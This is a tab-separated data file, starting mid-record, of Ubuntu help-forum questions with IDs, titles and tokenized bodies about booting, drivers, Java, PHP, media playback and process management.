crw-rw -- -- 1 root tty 7 , 2 gru 23 16:18 vcs2 crw-rw -- -- 1 root tty 7 , 3 gru 23 16:18 vcs3 crw-rw -- -- 1 root tty 7 , 4 gru 23 16:18 vcs4 crw-rw -- -- 1 root tty 7 , 5 gru 23 16:18 vcs5 crw-rw -- -- 1 root tty 7 , 6 gru 23 16:18 vcs6 crw-rw -- -- 1 root tty 7 , 7 gru 23 16:18 vcs7 crw-rw -- -- 1 root tty 7 , 128 gru 23 16:18 vcsa crw-rw -- -- 1 root tty 7 , 129 gru 23 16:18 vcsa1 crw-rw -- -- 1 root tty 7 , 130 gru 23 16:18 vcsa2 crw-rw -- -- 1 root tty 7 , 131 gru 23 16:18 vcsa3 crw-rw -- -- 1 root tty 7 , 132 gru 23 16:18 vcsa4 crw-rw -- -- 1 root tty 7 , 133 gru 23 16:18 vcsa5 crw-rw -- -- 1 root tty 7 , 134 gru 23 16:18 vcsa6 crw-rw -- -- 1 root tty 7 , 135 gru 23 16:18 vcsa7 crw -- -- -- - 1 root root 10 , 63 gru 23 16:18 vga_arbiter crw -- -- -- - 1 root root 10 , 238 gru 23 16:18 vhost-net crw-rw -- -- + 1 root video 81 , 0 gru 23 16:18 video0 crw-rw-rw- 1 root root 1 , 5 gru 23 16:18 zero wodim scanbus command : wodim scanbus wodim : no write mode specified . wodim : assuming -tao mode . wodim : future versions of wodim may have different drive dependent defaults . wodim : operation not permitted . warning : can not raise rlimit_memlock limits . device was not specified . trying to find an appropriate drive ... detected cd-r drive : /dev/sr0 using /dev/cdrom of unknown capabilities device type : removable cd-rom version : 5 response format : 2 capabilities : vendor_info : 'hl-dt-st' identification : 'dvdram gsa-t50n ' revision : 'rt04' device seems to be : generic mmc2 dvd-r/dvd-rw . using generic scsi-3/mmc cd-r/cd-rw driver ( mmc_cdr ) . driver flags : mmc-3 swabaudio burnfree supported modes : wodim : no such file or directory . can not open 'scanbus ' . obviously , i am trying to play original dvds from my region and the same region is set for the drive . i would really loved to watch some movies on my notebook . could you help me ?
396550	how to test what is causing a delay on user login ?	as of recently , when i log into my account there is a delay of 20s where first a black screen appears and then i log in . how can i see what is going on during the black screen ? i am trying to find out which app is causing such a delay .
396551	should i install ubuntu as 32 or 64 bit ?	i have a asus x502ca-hpd11 laptop.it is i3 , 64 bit and windows 8 . which one should i choose 32 bit or 64bit for dual boot .
396553	`` venetian shade '' screen appearence in ubuntu	i have a hp pavilion dv2500 that i have installed ubuntu 12.04 on . each time i try to install a newer distro of ubuntu on this laptop , i am confronted with a screen that looks like it is covered with a closed , semi-transparent venetian shade . in addition , an 1/8th an inch of the right hand side of the screen will wrap around to the left hand side of the screen . ( to access that part of the screen , you must move the cursor to the right . ) to date , ubuntu 12.04 is the newest distro that has not show such problems after install , though such problems have been observed when running in live mode . thank you for your time .
396557	installation ubuntu 12.04.64 bit on notebook toshiba : no root file system is defined . no partitions recognized	still with no solution on installing ubuntu 12.04.03 lts on my toshiba notebook u945 , alongside windows 8 pre/installed . i followed forum indications ( create a new partition from windows 8 , disabled secure root ) i also checked from gparted on `` try ubuntu '' mode , and it did recognize all partitions . previously i checked the ubuntu version i downloaded and confirmed it is not corrupted . you can see the message it appears on my screen when trying to install ubuntu , in this web site : http : //imgur.com/8tonwmd . any other suggestion ? thank you .
396563	list by `` artist '' in a folder ? how to view meta data of songs in nautilus ?	is it possible to list my .mp3 files by artist in my music folder ? i am not able to view any tag from a song ( artist/album/title of the songs ) in the preview ...
396567	how to fix `` chrome os is missing or damage '' when booted ?	i have a acer c710 chromebook , i did this and that with ubuntu , now every time i restart the chromebook i always get this error , ( chrome os is missing or damaged ) i tried recovery flash drive , did not work , tried holding the power button and taken out battery , did not work , the only time it rebooted and booted successfully is when i power washed it , but boom , got the same error , please look futher into this , its like i have given up hope here .
396568	ubuntu phone installation in blackberry device	my cuestion is how can i install ubuntu phone on my device if my device is an a blackberry z10 ( not android ) and if it 's possible .
396575	can not format hdd after windows 8	i 've just installed ubuntu 13.10 on my ssd , and i want to format hdd , where previously windows 8 was located , but i can not do that using standard disk application in ubuntu ( it gives error : `` failed to sync device /dev/sda2 : input/output error syncing device . failed ' ( udisks-error-quark , 0 ) '' ) i think it is somehow connected to the fact that previously intel rapid storage technology etc was active on my notebook . p.s . i 'm ready to do anything to be able to use this hdd further on on my ubuntu . please help !
396581	can not boot win 8.1 on raid0	i can not repair grub because ubuntu does n't see sda and sdb as raid0 with windows 8.1 . i think if i might be able to mount it then i can repair grub . or maybe i am wrong because i am noob : ) http : //paste.ubuntu.com/6648267/ p.s . : sda and sdb are raid0 , sdc and sdd have installed ubuntu studio and steamos
396584	system crashes frequently	i installed lubuntu 13.10 as a dual boot with windows xp on an e-machines . lubuntu crashes frequently , especially when i use the browser . i ca n't close lubuntu using alt+sysrq+reisub , must power off the computer . how can i log off without powering down ? how can i resolve the crashing problem ?
396585	disk errors . fsck returns 0	i 've been having disk issues recently . the disk usually remounts as read only after 1 hour of uptime at which point the os basically crashes . the disk is set to remount read-only after errors are encounter as per my fstab . i.e . error=mount -ro . i ran fsck yesterday while using a live usb and it returned 0 which apparently means no errors . its an ssd ( crucial m4 120gb ) so i 'm wondering if it my be write fatigue . here 's the dump from dmesg . sorry about the pics , could n't write to file as filesystem is ro at this point .
396586	does this phone support ubuntu for phones ?	i would like to know if a mobile phone with these specifications supports ubuntu for phones : android 4.0.4 processor : 1.0ghz snapdragon cpu , 512 mb ram , adreno 200 gpu memory : 1gb flash with 280mb user space , plus up to 32gb microsd external storage display : tft 3.5 '' , hvga 480 x 320 , capacitive touch wi-fi : 802.11 b/g/n
396587	itellij debug problem with maven	when i try to make a debug with intellij in a maven project in ubuntu 13.04 i get this error , i try with another ports , remote debug , and check the host file , have the same result . tested in a clean ubuntu installation gave me the same problem . also debug works fine in other cases . this is the command that intellij executes $ /home/user/opt/jdk/jdk1.7.0/bin/java -agentlib : jdwp=transport=dt_socket , address=127.0.0.1:58943 , suspend=y , server=n -dmaven.home=/home/user/opt/maven/apache-maven-3.1.1 -dclassworlds.conf=/home/user/opt/maven/apache-maven-3.1.1/bin/m2.conf -dfile.encoding=utf-8 -classpath /home/user/opt/maven/apache-maven-3.1.1/boot/plexus-classworlds-2.5.1.jar : /home/user/opt/idea/beta/lib/idea_rt.jar org.codehaus.classworlds.launcher exec : exec the error : error : transport error 202 : connect failed : connection refused error : jdwp transport dt_socket failed to initialize , transport_init ( 510 ) jdwp exit error agent_error_transport_init ( 197 ) : no transports initialized [ ../../../src/share/back/debuginit.c:750 ] fatal error in native method : jdwp no transports initialized , jvmtierror=agent_error_transport_init ( 197 ) [ 1 ] 5071 abort /home/user/opt/jdk/jdk1.7.0/bin/java -dfile.encoding=utf-8 -classpath any help would helps thanks
396588	set a hotkey to show an auto-hiding plasma panel ?	i 've set my plasma panel to auto-hide . how do i map a hotkey to pop out the panel so that i can have a look at it without moving my hand off the keyboard to the mouse and then dragging the mouse all the way down the screen ? i 've looked into the global keyboard shortcuts control , found the plasma desktop shell section , but failed to find a relevant item .
396592	how to disable nat for ipv6 ( nat66 ) ?	the current ubuntu lts does not support nat tables for ipv6 ( i.e . there is no ip6tables -t nat ) , and i 'm fine with that , in fact , a nat-less environment is the `` core '' of my networks . but , the next ubuntu lts will add support for ipv6 nat tables and , the problem is , i have `` orders '' to not allow it within my ipv6 network , i mean , we 'll not support nat66 ( nat for ipv6 ) . so , i need to make sure that ip6tables -t nat will not work here . how can i disable it ? can i just blacklist some kernel modules ? sysctl ?
396593	error updating and installing packages ubuntu	i was trying to install git in my ubuntu using application manager.and got a `` required installation of untrusted packages error '' .i followed a few forums and tried to run sudo apt-get updateand i got this error err http : //extras.ubuntu.com raring release.gpg could not connect to 172.16.0.20:8080 ( 172.16.0.20 ) , connection timed out err http : //in.archive.ubuntu.com raring release.gpg could not connect to 172.16.0.20:8080 ( 172.16.0.20 ) , connection timed out err http : //security.ubuntu.com raring-security release.gpg could not connect to 172.16.0.20:8080 ( 172.16.0.20 ) , connection timed out err http : //dl.google.com stable release.gpg could not connect to 172.16.0.20:8080 ( 172.16.0.20 ) , connection timed out err http : //in.archive.ubuntu.com raring-updates release.gpg unable to connect to 172.16.0.20:8080 : err http : //in.archive.ubuntu.com raring-backports release.gpg unable to connect to 172.16.0.20:8080 : reading package lists ... done w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring/release.gpg could not connect to 172.16.0.20:8080 ( 172.16.0.20 ) , connection timed out w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-updates/release.gpg unable to connect to 172.16.0.20:8080 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/raring-backports/release.gpg unable to connect to 172.16.0.20:8080 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/release.gpg could not connect to 172.16.0.20:8080 ( 172.16.0.20 ) , connection timed out w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/release.gpg could not connect to 172.16.0.20:8080 ( 172.16.0.20 ) , connection timed out w : failed to fetch http : //dl.google.com/linux/talkplugin/deb/dists/stable/release.gpg could not connect to 172.16.0.20:8080 ( 172.16.0.20 ) , connection timed out w : some index files failed to download . they have been ignored , or old ones used instead . i thought it was a problem with the network connection and tried pinging google.com and it was working perfectly.can anyone please help me with this.i am new to ubuntu
396598	games do not display on steam account	i have just installed 64bit ubuntu 12.04 , and steam . the games i have payed for previously do not show up in my library . the heading of linux games , there is 0 . the heading of all games there is 0 . i have previously purchased , skyrim on my windows operating system , and would like to play skyrim on ubuntu steam , how can i do this ? do i need wine to run steam ? do i need to pay for the games again ? yes , i am sure about the account / login . if i use wine , might skyrim work ? ( provided that i can get the game to show up )
396599	ubuntu still booting	okay , when i tried to install ubuntu it showed up a code error so i uninstalled ubuntu , but when the pc boots up it gives me an option if i want to start with windows or ubuntu , and i already formatted my pc like 3 times and still giving the option to boot with ubuntu and that annoys me , please help !
396601	hd4400 dual monitor mini displayport	how can i get ubuntu 12.04 ( or later ) to recognise a second monitor on a gigabyte brix with intel hd4400 . the hdmi works fine the mini display port is not recognised , was hoping intel drivers would fix it ?
396603	when ubuntu will be fully integrated with openldap ?	currently , i do n't see ubuntu fully integrated with openldap , i mean , after installing and enabling openldap in your ubuntu ( libnss-ldap , pam-ldap , etc-ldap and lots of pain ) , you can no longer use the standards `` adduser / deluser '' commands , or ubuntu gui desktop `` user accounts '' under `` system settings '' ... plus , you now depends on third part tools to manage your user accounts `` a part '' from ubuntu , which looks ugly and unprofessional , not to mention that it is not `` for humans '' , as ubuntu must be ... ; - ) distros like fedora , have for example , this project : http : //directory.fedoraproject.org/ - which seems to be very good ! but , i 'm with ubuntu / debian . so , any plans to fully integrate openldap with ubuntu server and desktop ? with zeroconf ? which works `` out-of-the-box '' , by default ... ? i do n't see too much activity on `` ubuntu directory team '' and `` ubuntu enterprise team '' seems be too focused on windows-users demands , i do n't need any integration with windows ( ad ) or samba , but i need an openldap smoothly integrated with my preferred linux distro , ubuntu . ; - ) it must follow the kiss principle ... =p best ! thiago
396605	installed ubuntu and ca n't connect to wifi	i installed ubuntu and ca n't connect to the wifi . the wired connection is working and everything else is fine .
396609	upstart unknown job problem	i set up nginx according to instructions here and it all went well but i am unable to start with $ start < my app name > i created /etc/init/nomilkfor.me.conf ( this is the domain name ) and this is what is in the file : description `` ubuntu 13.10 on samsung laptop '' author `` zeynel '' start on startup stop on shutdown setuid deploy chdir /deploy console log env port=4000 exec java -jar my-webapp-0.1.0-standalone.jar i reload nginx with $ sudo nginx -s reload and i try $ start nomilkfor.me but i get start : unknown job : nomilkfor.me what am i doing wrong ? i also tried to open the log files in /var/log/upstart but i could not open them with nano .
396611	difference between lubuntu mini core and lubuntu mini desktop	i 'm looking at using the minimal install for lubuntu 13.10 on a power pc ibook g4 . i was originally going with the full lubuntu 12.04 for ppc version on usb , but as of yet i have been unable to boot from usb and the dvd does n't boot . so , i looked into using the minimal install , as it can fit on a cd . however , i 'm not sure whether to go with the lubuntu 13.10 mini desktop or lubuntu 13.10 mini core ? what 's the difference ? is it the number of non-essential packages included ( like abiword , leafpad , etc . ) or what ? thanks !
396613	what are some desktop enviroments that are 100 % open-source and touch-friendly ?	it needs to be 100 % open source it must not recommend any closed/shared source software please post in the following format : desktop environment name a screenshot of the desktop environment why you should use it how to get/install ( without adding ppas/repos with non-free software and/or installing non-free software or metapackages that need non-free software or softwa-re that needs non-free software ) it your opinion of why/why not someone should use this desktop environment for what people it is ( etc enthusiasts , normal people , or people who find computers hard to use . ) please do not post duplicates unless you have a better review of them . you can not post just windows managers alone , but you can post window managers and desktop environments combined ( etc kde/openbox ) . the definition of touch-friendly , in this case would be big icons and text usable with touchscreens
396614	install blank sceren hp envy core i7	i am trying to install ubuntu using a live usb . when i try to boot i get the screen asking me to try ubuntu or install . whatever i choose the system starts booting then i see a flash on the screen then the screen turns off , it 's not just dark but off . the boot seems to continue the wifi turns on ( the light turns on ) and i see flashes on the usb . then nothing it just sits . i have followed the guides and turned off secure boot intel smart response , changed the usb 3 support to auto , tried with legacy mode active . i have tried to install ubuntu 13.10 & 12.04 and the gnome spin of 13.10 , as well as other distros ( fedora , opensuse , manjaro ) all with the same exact problem . my computer is a hp envy 15-j067cl 15.6 '' touch laptop computer , intel core i7-4700qm with the intel hd graphics 4600 . i really would love to get ubuntu up and running , tho for work i need to dual boot . again thanks for your help !
396616	removed jdk6 , installed jdk7 . java_home broke and javac not installed	i am finding that the javac is not in the java-7-openjdk-i386 package . problem 1 : $ javac the program 'javac ' can be found in the following packages : * default-jdk * ecj * gcj-4.6-jdk * openjdk-6-jdk * gcj-4.5-jdk * openjdk-7-jdk try : sudo apt-get install < selected package > problem 2 : so i decided to try installing the jee from oracle . but , oracle jee is not hosted in the ppa because that 's not allowed by the new java license ( which is also the reason why it has been removed from the official ubuntu repositories ) ; the package in the ppa automatically downloads oracle java jdk 7 from its official website and installs it on your ubuntu / linux mint computer , just like the flashplugin-installer package does . first , what is a ppa ? i downloaded java_ee_sdk-7-web-jdk7-linux.sh into the /usr/lib/jvm directory . and tried to uncompress it . $ sudo sh ./java_ee_sdk-7-web-jdk7-linux.sh could not locate a suitable jar utility . please ensure that you have java 7 or newer installed on your system and accessible in your path or by setting java_home . problem 3 : $ echo $ java_home /usr/lib/jvm/default-java $ java -version java version `` 1.7.0_25 '' openjdk runtime environment ( icedtea 2.3.10 ) ( 7u25-2.3.10-1ubuntu0.12.04.2 ) openjdk server vm ( build 23.7-b01 , mixed mode ) what i think happened was that i removed jdk6 and the default-java which was a link to the installation went with it . so the $ java_home now points to nothing and it needs to point to java-7-openjdk-i386 package . what is the solution for this ?
396617	dual boot windows 7 64-bit ubuntu studio 13.10 64-bit asus m5a99x evo r2.0 amd fx-8350 uefi secure boot	i am setting up a new machine with asus m5a99x evo r2.0 with the latest firmware amd fx-8350 amd64 and would like to do a dual boot with windows 7 64-bit and ubuntu studio 13.10 64-bit . after installing windows , the ubuntu installation will not complete saying the 'grub-efi-amd64-signed ' package failed to install into /target/ . i have been doing dual boots with windows and linux for years with mbr , traditional bios , and grub legacy on a dedicated partition to keep the oses independent of each other . the new machine now has uefi and all that goes with that and i am stumped . it seems that installing windows 7 from dvd forces it to use uefi which then requires ubuntu to use efi also . if there is no way to install windows without uefi then i would like to at least turn off secure boot if possible to keep the installation simpler . i am not sure yet if the bios will allow this . because uefi is designed to be used with gpt hard disk formatting , many of the workarounds i have read about using mbr formatting may create problems . my understanding is that the newer ubuntus support secure boot , but windows 7 does not so there needs to be a way of using uefi but not secure boot for this to work . ideally i am looking for a way to set up a dual boot similar to the old setup with an independent bootloader on its on partition and chain-loading . if that is still not possible yet please point me to a successful tutorial of an alternate setup . thanks
396619	how do i change the title bar buttons on kubuntu ?	i 'm thinking about making some custom buttons for the window title bar ( close , maximize , etc . ) for kubuntu 13.10 . the problem is that i ca n't figure out what files i 'm supposed to be editing to do this . could someone please tell me what files i need to change ?
396624	ubuntu on mac mini monitor display	i have ubuntu installed in two machines : a laptop and a mac mini . while in the laptop the screen is fine , on mac mini the resolutions option showing are only two and neither match perfectly well . currently it shows the option : 1024x768 or 800x600 . it is a led monitor philips 24 '' ( 61cm ) model 244el2 . i have never got such similar problem when running ubuntu on pc . is it a problem of drivers , related with apple mac mini ? all suggestions are welcome .
396626	copying files with nautilus bottlenecking the whole system	when i copy files using nautilus , most recently from a ntfs external hdd to a fat32 usb drive , the system crawls to a stop . everything , even tty login is affected . it 's impossible to use the machine . i have a new computer , 3rd gen i7 , 6 gigs of ram , and i feel like i should n't be having this issue . has to be a bug . often times the destinations , as i said above , are both external . my os is installed on a ssd , and i have a second internal hdd . copying from these seems fine . running ubuntu 13.10 , clean install , 64-bit , fully updated . any help is appreciated .
396629	how to get dual-boot working properly ?	i installed 12.04 via usb ( side-by-side windows 8.1 ) on my new hp 2000 windows 8 laptop after upgrading to windows 8.1 . had issues with windows boot loader and grub so i spent yesterday trying to make my ubuntu boot smoothly . i am somewhat of a noob ( total noob when in comes to dual-boot ) , so i bumbled around and seem to have screwed things up.this is the point i 'm at now when i turn on my machine , it takes me immediately to grub rescue . i am able to boot ubuntu by using the following command sequence : root= ( hd0 , gpt7 ) prefix= ( hd0 , gpt7 ) /boot/grub insmod normal normal that takes me to the grub screen . once at the grub screen , all i can do is boot ubuntu . when i try to boot windows , i get the following message : error : unknown command `` drivemap '' . error : invalid efi file path . i tried fixing grub in the terminal using the following commands sudo update-grub sudo grub-install /dev/sda the update installs , but does not solve the problem . also , every time i boot my machine , i have to go through the whole grub rescue insmod mess to get to grub and launch ubuntu . i need help getting windows to work as well as not having to go through grub rescue every time i use my computer . tried using boot-repair to no avail . assistance is greatly appreciated . thanks !
396630	is there an opensource alternative to fontprep ?	i switched from mac os to ubuntu . so far it 's going great , but i 'm missing one small application : fontprep . it 's used to generate webfonts . please see the fontprep website . i 'm wondering if there 's something similar on ubuntu . i googled it but did n't find anything similar , i know you can achieve more or less the same thing using online tools like fontsquirel 's fontgenerator but i 'm looking for something offline . please help this ubuntu newbie out .
396631	what happens if my system is improperly shutdown ?	i have lubuntu 13.10 in my seven-year-old pc with 512mb ram and an intel dual core 3.00ghz x 2 processor . i sometimes unplug it from the power while it is running , in an emergency situation . please tell me if there may be any adverse consequences of manually powering off my computer while it is running .
396636	basic question on how to read files in a directory	this is a beginner question : i 'm trying to write a .sh file to automatically rename files in a directory . the file would look something like for filename in directory do mv filename `` newprefix '' +filename done i 'm trying to figure out how to write the for filename in directory part . i tried the following : dir = ' . ' for filename in dir this is working , but whenever i run this script , i get dir : can not access = : no such file or directory . why ?
396639	`` no such file or directory '' but the file actually exist ! / executable problems	i 've been using ubuntu ( 13.10 ) for a couple of months , and i really liked . but it crashed often and that 's something that i did n't liked . i was able to run all my files in my terminal without any problem , like my favourite games . and also the executable files . i was able to run them perfectly . then elementary luna os came out and i decided to give it a try . when i installed was really quick , but after some days i realized that i could n't open most of my files on the terminal . just a few , i ca n't play games anymore because of that problem . also , i ca n't open executable files . so , i decided to reinstall ubuntu , and guess what ? i was n't able to do nothing ! my games and everything , i could n't open them because the terminal did n't let me . always displaying the message `` no such file or directory '' while the file actually exist . also tried in linux mint , same thing . i 've tried everything , ca n't do anything . could some of you help me . all of my desktops were x64 bits edition . right now i 'm running linux mint 16 petra cinnamon desktop x64 . how to solve this ?
396640	install the stable version of ubuntu touch on galaxy nexus using windows	i 'm trying to install the stable version of ubuntu touch on my galaxy nexus ( maguro ) . the flashing part is done but the phone fore some reason does n't go beyond the google logo . could some one please guide me ? i 'm using windows 8 and flashed using the fast boot commands and also with the autodeploy commands ... both times i had the same issue .
396642	blu-rays do n't work on vlc	i have a panasonic uj-120 bd-rom drive and i also have keydb.cfg in ~/.config/aacs . however when i try to play the bluray in vlc it says bluray error : aacs : mmc failed . what do i do ?
396644	how to create empty document in ubuntu 13.10 ?	i 've installed ubuntu 13.10 , but in right click only `` new folder '' no `` empty document '' ! how to create new empty document now ?
396646	clean re-install of windows - does ubuntu recognise computer	i have another cloud storage and i had to reinstall windows on my computer . that cloud storage did not recognise my computer and set up another set of files . so i had 2 backups and at first did not realise so was backing up to the wrong backup . with ubuntu , when you do a re-install of windows will ubuntu recognise your computer as the same computer ?
396653	intel smart response technology	how to install ubuntu ( any version ) in intel smart response technology case without changing bios setting ? when i do i can not see any partition on hdd to choose to install ubuntu side by side windows 7 ! thanks for reading my quetion .
396654	how to run the python program in the background in ubuntu machine ?	i am running my python program from my ubuntu machine as follows - root @ dbx1145 : /home/david/zookteck # python test.py but if i close my ubuntu machine , then my whole program will get stopped.. is there any way of running this python program in the background and if i close my terminal then still it keeps on running ? and also after running this program in the background , how do i find out my actual program whether it is still running or not if i am logging back again to that machine ?
396658	usb not recognized	i tried installing linux so windows is n't installed anymore but usb not recognized . windows loader , grub and hdd0 show up , but error . usb is not recognized , and windows loader is not working . do not have windows installed anymore . installed with an ubuntu stick . originally had windows 8 disabled uefi and secure boot .
396659	weird setting in ubuntu 13.10 after reinstalling unity	after reinstalling unity in ubuntu 13.10 my setting is weird now ! i do n't know how to solve but i have attached image below ! how can i fix this ?
396663	how to connect to wi-fi on ubuntu 12.04 ?	so , i just got this new laptop today ( well , it 's actually pretty old , but it 's new to me ) and i downloaded ubuntu , and totally deleted windows . the thing is , when i click the wi-fi button near the top-right , it does n't show anything to connect to . i had no problem with connecting when i dual-booted ubuntu to my windows desktop . is it because i replaced windows ? it was working fine before i put ubuntu on . i looked into it a bit , and something told me to put lspci -vvnn | grep 14e4 into the terminal . it returns : 02:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5751 gigabit ethernet pci express [ 14e4:1677 ] ( rev 01 ) 03:03.0 network controller [ 0280 ] : broadcom corporation bcm4306 802.11b/g wireless lan controller [ 14e4:4320 ] ( rev 03 ) what am i supposed to do with this information if i do n't have access to any type of internet connection on my laptop , and ca n't access any other computers right now ( i 'm typing this on my phone ) . how do i connect to wi-fi ?
396665	is there a workaround to view adobe access ( drm ) flash videos on any browser ?	ubuntu 13.04 google chrome 31.0.1650.57 ( official build 235101 ) os linux javascript v8 3.21.18.7 flash 11.9.900.152 when i try to watch xfinitytv shows via streaming ( specifically homeland - showtime ) i get stuck at the 0:00 and it says buffering ... some problems : these streaming services now require flash versions 11.8 or higher . adobe flash in browsers other than chrome ( ex . firefox ) are only supported up to version 11.2 . so this wo n't work . google chromes uses pepper flash which is supported up to 11.9 ! , but `` viewing adobe access ( drm ) content is not supported , since adobe does not support it on linux . '' ( docs ) so it looks like i am screwed . i need version 11.8 or higher which means firefox is out the door since adobe only supports it up to 11.2 . chrome 's pepper flash is currently at version 11.9 , but since it is a adobe access ( drm content ) it is unsupported for linux users . any ideas ? i have hit a wall . vm ( wine ) the only option ? can i somehow get pepper flash into firefox ?
396666	how do i dual boot ubuntu and windows 7	i had ubuntu on my computer and then i reinstalled windows 7 and now the grub mean is gone from start up . i ca n't remember how i did it last time . i am on windows 7 right now and need to know if i can do it from here or if i have to get onto ubuntu to do it .
396667	why do i have gnome settings on unity desktop ?	last time i installed cinnamon and it broke my unity . so i removed cinnamon and reinstalled unity so after reinstalling i have gnome sitting on unity desktop . and now i do n't have minimize button for maximum programs ( i have in full screen mode but i do n't have in half screen mode ) . how do i fix this ?
396669	unable to boot from usb on surface pro	i am getting error messages when i try to boot ubuntu 12.04 from a usb stick on my surface pro . i disabled secure boot and followed the steps suggested in an earlier post on this website to create usb installer for uefi ( can not get to ubuntu 12.10 live usb environment on the microsoft surface pro ) and chose try ubuntu without installing on the grub menu . i could go past the `` ubuntu '' logo but i almost always never got to the desktop . i get at least two different error traces . i got lucky just once and could get to the ubuntu desktop , but then when i asked it to shutdown , i got a similar trace . bug : unable to handle kernel paging request at xxxxx , followed by a long trace ending with [ xx.xxxxxx ] kernel panic -- not syncing : fatal exception in interrupt [ xx.xxxxxx ] drm_kms_helper : panic occurred , switching back to text console '' . and then it freezes . a paraphrase of ( i do n't remember the exact message ) bug : kernel null pointer dereference , followed by a long trace ending with drm_kms_helper : panic occurred , switching back to text console . and then it freezes . the last sentence seems to be the same in both . something to do with drm_kms_helper . i searched for this on the web and it seems it has to do with wifi drivers . i read on the web ( e.g. , on www.geek.com ) that ubuntu on surface pro needs a workaround for wifi . but i did n't expect to have boot problems because of that . any suggestions ? is it just a problem with booting from usb ? i mean , if i go ahead and install ubuntu , will things be fine ? imo , i would get the same boot problems .
396670	re dash and unity	can not get dash or unity to show up on screen and computer will not accept password when i try to fix this problem . have tried ctrl+alt+f1.typed in sudo apt-get install gnome-panel.this is as far as i can get as it asks me to login and does not recognise login .
396671	how to change an audio output device by a keyboard hotkey ( or a command shortcut ) ?	i 'd like to have a faster way of changing audio out device ( between internal notebook 's [ or a headphones ] and hdmi external monitor 's ) instead of opening sound settings , which has to load and requires too much clicking for an action so simple and repeatable . preferably a change from the device being used to a next ( not used ) sound device , but static change ( to a or to b ) would be nice as well ! i can imagine keyboard hotkey binding or making a command shortcut , eventually installing additional software .
396673	help with ubuntu 13.04 on a usb flashdrive !	i have a issue when i try and boot ubuntu from my usb , it will take me to the ubuntu splash screen with the dots , change my resolution to 1280x720 and then my screen will go blue and nothing happens , can i get some help ? thanks in advance .
396674	tools to prevent hard reboot	a kid i 'm keeping is an only child ( you can guess how that is ) . from time to time , she does things she 's not supposed to then tells us she did n't do it . i 've told her not to hard poweroff my computer but it 's a common practice at her house . i 've looked in all the logs i can find online for all the phrases i can find . none of the logs mention anything about starting up or shutting down so i ca n't tell anything from them . every phrase i find for the logs , i put in the find section of gedit and gedit says it 's nowhere to be found in the log . it 's as if my computer has been on since day one ( according to the posts i 've already read about shutting down and powering up being logged ) . is there a way to prevent her ( or at least notify myself of ) hard poweroffs ?
396677	boot-repair failed to fix my booting files	http : //paste.ubuntu.com/6649044/ the above is what boot-repair gave me . i hope someone can interpret it and let me know what the problem is . thanks in advance guys : - ) jdl
396678	ubuntu 13:10 - downgrade php 5.5.3 to 5.4	can someone give me step my step instructions on how to do this ? will i have to worry about and data/databse loss doing this . thanks ! sudo apt-get remove -- purge dpkg -l | grep php | grep -w 5.5 | awk ' { print $ 2 } ' | xargs sudo apt-get install php5=5.4.23-1ubuntu3.4 php5-cli=5.4.23-1ubuntu3.4 php5-common=5.4.23-1ubuntu3.4 libapache2-mod-php5=5.4.23-1ubuntu3.4 sudo apt-get install php5=5.4.23-1ubuntu3.4 php5-cli=5.4.23-1ubuntu3.4 php5-common=5.4.23-1ubuntu3.4 libapache2-mod-php5=5.4.23-1ubuntu3.4 sudo apt-get install php-pear=5.4.23-1ubuntu3.4 php5-curl=5.4.23-1ubuntu3.4 php5-gd=5.4.23-1ubuntu3.4 php5-intl=5.4.23-1ubuntu3.4 php5-mysql=5.4.23-1ubuntu3.4 php5-pspell=5.4.23-1ubuntu3.4 php5-recode=5.4.23-1ubuntu3.4 php5-snmp=5.4.23-1ubuntu3.4 php5-sqlite=5.4.23-1ubuntu3.4 php5-tidy=5.4.23-1ubuntu3.4 php5-xmlrpc=5.4.23-1ubuntu3.4 php5-xsl=5.4.23-1ubuntu3.4
396680	ubuntu 13.10 black screen past grub	i 've had ubuntu 13.10 installed for a couple of weeks . it has ran smoothly the whole time . starting today , whenever i try to boot into ubuntu , i 'll view grub and the the splash screen loads and then a black screen with a constant underscore shows , after that , nothing happens . trying to boot using nomodeset will start a command line ( no gui ) . running startx will fail ; the only noticeable feature is that it says `` ( ee ) no screens detected . '' trying to disable secure boot and enable `` launch csm '' yields identical results . my computer is an asus q500a . it is using an intel i5-3210m and intel hd 4000 graphics .
396684	how to kill the process using the name of the program instead of pid ?	i started my python program in the background using nohup as mentioned below - nohup zook.py & now i am trying to kill this process so i did the ps command as mentioned below root @ phxdbx1145 : /home/david/zook # ps ax | grep zook.py 16352 pts/6 s+ 0:00 grep -- color=auto zook.py but somehow , everytime its pid getting changed , i do n't know why . whenever i do like this - kill -9 16352 it always say , no such process . and when i do px command again , i see that pid got changed automatically.. so i am not sure how do i kill this process ? is there any way i can kill the process with the name somehow ? update : - this is what i am getting . i did pkill -9 zook.py and then i did ps command as mentioned below and it is shwoing zook.py constantly ? root @ dbx1145 : /home/david/zook # pkill -9 zook.py root @ dbx1145 : /home/david/zook # ps ax | grep zook.py 23870 pts/6 s+ 0:00 grep -- color=auto zook.py root @ dbx1145 : /home/david/zook # ps ax | grep zook.py 23872 pts/6 s+ 0:00 grep -- color=auto zook.py root @ dbx1145 : /home/david/zook # ps ax | grep zook.py 23874 pts/6 s+ 0:00 grep -- color=auto zook.py root @ dbx1145 : /home/david/zook # ps ax | grep zook.py 23876 pts/6 s+ 0:00 grep -- color=auto zook.py
396690	vlc libraries problem	i have ubuntu 13.10 x64 . i installed the 32 bits libraries , and nothing bad happened . but then , i wanted to install vlc media player and it asked me to uninstall the 32 bits libraries to accomplish it 's installation . how can i install it without uninstalling the 32 bits libraries ?
396691	youtube going white on ubuntu	whenever i use ubuntu and minimize the youtube videos from full-screen mode , the screen goes white . this never happened or never happens in windows . why does it happen in ubuntu ?
396692	virtual router running in ms windows but ap hotspot mode not supported !	i have a dual boot machine with ms windows and linux . while on windows , i am able to share my internet connectivity with other devices using the virtualrouter software . now virtualrouter is typically used on windows and linux version is not available . i was keen on doing the same thing with the ubuntu internet connectivity . incidentally , i discovered that the ap hotspot is not supported on my machine / wifi card by running the following command : iw list which says that my wifi card is of wiphy type ! any hints on how to fix this ?
